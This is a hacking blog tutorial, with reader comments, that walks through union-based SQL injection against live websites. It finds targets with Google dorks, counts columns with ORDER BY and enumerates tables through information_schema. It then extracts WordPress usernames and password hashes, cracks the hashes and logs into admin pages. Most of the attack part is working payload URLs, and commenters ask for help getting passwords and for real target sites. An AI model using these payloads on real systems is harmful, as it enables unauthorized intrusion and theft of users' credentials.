SQL Injection Part 2 -Explained With An Example

In my previous article SQL injection Part 1. I explained how we can hack websites using simple SQL injections. Today i will explain how we can hack websites using advanced SQL injections. Today there are number of articles on different blogs about SQL injections. So i thought of writing this article using an example so it gives you better understanding.

In my previous article i have given all the basic stuff regarding sql, today i will be directly getting into injection parts. If you have not read the previous part SQL injection Part 1 . Kindly go through it before reading this one.


Finding Out A Vulnerable Website
We can use google dorks to find  vulnerable sites.If you want to find SQLi vulnerability on a particular website, then also you can use google dorks. All you need is a basic knowledge of advanced google searching.

Here are some google dorks.
inurl:article.php?ID=
inurl:newsDetail.php?id=
inurl:view.php?id=
inurl:page.php?id=
inurl:productdetail.php?id=

Now we have to check for the vulnerability. To do this add a single quote(‘) at the end of the URL. If you get an error or blank page, the site is vulnerable to SQL injection.

Here i found a vulnerable link of a website.
www.vulnerablesite.com/view.php?id=47


When i add single quote at the end of the URL, some data of the page is missing. Hence we can determine that it is vulnerable to SQl injection.
www.vulnerablesite.com/view.php?id=-47’



Finding Out The Number Of Columns
Now our job is to find out the number of columns in the sites database in order to access it. We can find this by simply adding “order by “ query at the end as shown below.
www.vulnerablesite.com/view.php?id=47 order by 1— (no error)
It should return the page with no error.
Now add one more column to the above query. It looks like
www.vulnerablesite.com/view.php?id=47 order by 2— (no error)
We should increase the count until we get an error. When we get an error, it means that there are no more columns to return the results.

In my example i got an error at the following query.
www.vulnerablesite.com/view.php?id=47 order by 10— (error)
It means that the site has 9 columns.



Finding Out The Most Vulnerable Volumn
When we are done with number of columns, we need to find the most vulnerable column. For this we use the following query.
www.vulnerablesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9—
It should return the most vulnerable columns.Some times it may not display the columns on your page. In such cases add ‘-‘ without quotes before your id number. This is to call a non existing page to display your data.

Then the above query looks like
www.vulnerablesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9—

If you observe, i got 2 as the most vulnerable column.The most interesting part of our attack starts here. We need to extract the data from the database here.


Finding Out The Table Names
First we will find out the table names from database. Just add the following query to find the table names.
www.vulnerablesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—

It gives us a list of tables.


Now search for the tables you are interested in. It means, a hacker generally looks for the tables that contain usernames and passwords. So select a table you want.


Finding Out The Column Names
Now we need to extract the column names from the tables inorder to extract the data. We can find the column names using the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’yourtablename’—

In my example the query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from information_schema.columns where table_name=’wp_users’—



it displays all the column names from the table ‘wp_users’



Extracting Data
Now we have to extract the information such as usernames, passwords etc.

We can do this as shown in the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name ,3,4,5,6,7,8,9 from yourtablename—
In my example this query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login ,3,4,5,6,7,8,9 from wp_users—
Similarly you can get the password using the same query by simply changing the column_name as user_pass in my example.

Many websites store passwords using MD5 encryption. So we have to crack it using any MD5 cracker. www.md5cracker.co.uk is an online service to crack MD5 hashes. Then find out the admin page, and login to the website.
For more about MD5 kindly read the tutorial hashes and salts from here.

Hope you enjoyed this tutorial. Please leave your comments for further doubts and clarifications.
About the Guest Author:
This article is written by Mr Srinivas, He owns Hackinginception where he writes articles related to hacking .If your interested in writing a guest post @Hackaholic please contact me

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Anonymous

Thanks this helpd me :)

REPLY
Anonymous

its not complete how to get the password tell the last step also

REPLY
srinivas said on November 9, 2011 at 2:28 AM :

@Anonymous
Bro read it completely....
the following query gives you the user name.
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login ,3,4,5,6,7,8,9 from wp_users—

By replacing "user_login" with "user_pass" in the same query.. u can get the password. :)

REPLY
phaninaidu said on August 19, 2012 at 9:30 PM :

hi bro when i put an ' in the end of url if it get error page can i hack it

REPLY
Tarash Sajaia said on November 26, 2012 at 6:13 AM :

pplease write url or pm me in google of this site

REPLY
ANON said on December 26, 2012 at 3:34 AM :

Hi bro just want to ask some details regarding finding about table name...

www.vulnerablesite.com/view.php?id=-47 union select 1,table_name ,3,4,5,6,7,8,9 from information_schema.tables—

on your example above you replaced "2" with table_name
is "table_name" a predefine parameter in SQL?

same question regarding information_schema.tables (is this also a predefine parameter?)

because if it is then I assume it will always work.

Thanks bro

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger